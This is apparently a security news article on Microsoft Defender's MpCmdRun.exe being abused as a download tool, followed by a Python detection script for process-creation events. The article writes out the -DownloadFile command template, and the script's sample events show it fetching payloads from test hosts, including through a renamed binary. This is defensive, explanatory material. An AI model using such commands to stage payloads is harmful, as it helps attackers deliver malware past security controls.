A recent update to Microsoft Defender has unintentionally turned Windows 10's built-in antivirus into a conduit for fetching malicious files from the internet onto a user's computer.
According to penetration tester Mohammad Askar, a change to the Microsoft Defender command-line tool allows attackers to use it as a LOLBin (living-off-the-land binary).
Windows 10 ships with many such binaries, each with a legitimate purpose. Because they are trusted, Microsoft-signed components, an attacker with sufficient privileges can abuse them to bypass security controls and carry out attacks without the victim's knowledge.
According to Askar, the Microsoft Defender command-line tool now supports a new option, -DownloadFile. The change is believed to have been introduced in Microsoft Defender version 4.18.2007.9 or 4.18.2009.9.
As a result, an attacker with local access can use the Microsoft Antimalware Service Command Line Utility (MpCmdRun.exe) to fetch a file from the internet with a command of the form: MpCmdRun.exe -DownloadFile -url <URL> -path <local path>
Using this technique, Askar was able to download a Cobalt Strike payload from a remote server through Defender's own binary.
While Defender itself will detect and remove malicious files downloaded this way, it is not clear whether other popular antivirus products would catch such a download, in particular on systems where Defender's default protection has been turned off.
System administrators are advised to add this new LOLBin to their watch lists and detection rules promptly, so that it cannot be used unnoticed to stage an attack.
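One way to act on that advice is to flag -DownloadFile invocations in process-creation telemetry. The following Python is an added example written for this page; it is not code from the original report or from Askar. It assumes Sysmon Event ID 1 style field names (Image, OriginalFileName, CommandLine, ParentImage) and runs over a few constructed sample events, including one where the binary has been copied and renamed, which a detection keyed only on the file name would miss.

```python
"""Detect MpCmdRun.exe -DownloadFile usage in process-creation events.

Added example, not part of the original article. Field names follow the
Sysmon Event ID 1 schema (assumed); the sample events below are constructed.
"""
import re
from dataclasses import dataclass
from typing import Optional
from urllib.parse import urlparse

# Constructed sample events (not real telemetry). The platform folder version
# and the hosts/paths are illustrative only.
SAMPLE_EVENTS = [
    {   # routine signature update: MpCmdRun, but no download flag
        "Image": r"C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2009.9-0\MpCmdRun.exe",
        "OriginalFileName": "MpCmdRun.exe",
        "CommandLine": r'"C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2009.9-0\MpCmdRun.exe" -SignatureUpdate',
        "ParentImage": r"C:\Windows\System32\svchost.exe",
    },
    {   # the LOLBin pattern described in the article, launched from a shell
        "Image": r"C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2009.9-0\MpCmdRun.exe",
        "OriginalFileName": "MpCmdRun.exe",
        "CommandLine": r"MpCmdRun.exe -DownloadFile -url https://203.0.113.10/beacon.exe -path C:\Users\Public\beacon.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
    },
    {   # same binary copied and renamed; only OriginalFileName gives it away
        "Image": r"C:\Users\Public\update.exe",
        "OriginalFileName": "MpCmdRun.exe",
        "CommandLine": r"update.exe -downloadfile -url http://example.test/a.dll -path C:\Temp\a.dll",
        "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    },
]

# Windows-style tokenizer: keep quoted arguments together, strip the quotes.
_TOKEN = re.compile(r'"[^"]*"|\S+')


def tokenize(cmdline: str) -> list[str]:
    return [t.strip('"') for t in _TOKEN.findall(cmdline)]


def basename(win_path: str) -> str:
    """Last path component of a Windows path, independent of the host OS."""
    return win_path.rsplit("\\", 1)[-1]


def is_mpcmdrun(event: dict) -> bool:
    """Match on the PE OriginalFileName as well as the on-disk name."""
    original = (event.get("OriginalFileName") or "").lower()
    image = basename(event.get("Image", "")).lower()
    return original == "mpcmdrun.exe" or image == "mpcmdrun.exe"


@dataclass
class Finding:
    image: str
    parent: str
    url: Optional[str]
    path: Optional[str]
    host: Optional[str]
    renamed: bool   # binary runs under a name other than MpCmdRun.exe


def analyse(event: dict) -> Optional[Finding]:
    """Return a Finding if this event is an MpCmdRun -DownloadFile invocation."""
    if not is_mpcmdrun(event):
        return None
    toks = tokenize(event.get("CommandLine", ""))
    lower = [t.lower() for t in toks]
    if "-downloadfile" not in lower:     # flags are case-insensitive
        return None

    def value_of(flag: str) -> Optional[str]:
        try:
            return toks[lower.index(flag) + 1]
        except (ValueError, IndexError):
            return None

    url = value_of("-url")
    host = urlparse(url).hostname if url else None
    return Finding(
        image=event["Image"],
        parent=event.get("ParentImage", ""),
        url=url,
        path=value_of("-path"),
        host=host,
        renamed=basename(event["Image"]).lower() != "mpcmdrun.exe",
    )


def scan(events: list[dict]) -> list[Finding]:
    return [f for f in (analyse(e) for e in events) if f is not None]


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        tag = " (renamed binary)" if f.renamed else ""
        print(f"ALERT{tag}: {f.image} fetched {f.url} -> {f.path}; parent={f.parent}")
```

The OriginalFileName check is what catches the renamed copy; in environments without Sysmon, the equivalent Windows Security event (4688 with command-line auditing enabled) lacks that field, so a rule there has to fall back to the command-line flag alone. Treat the download host and parent process as enrichment for triage rather than as conditions for alerting: any use of -DownloadFile launched from a user shell deserves a look.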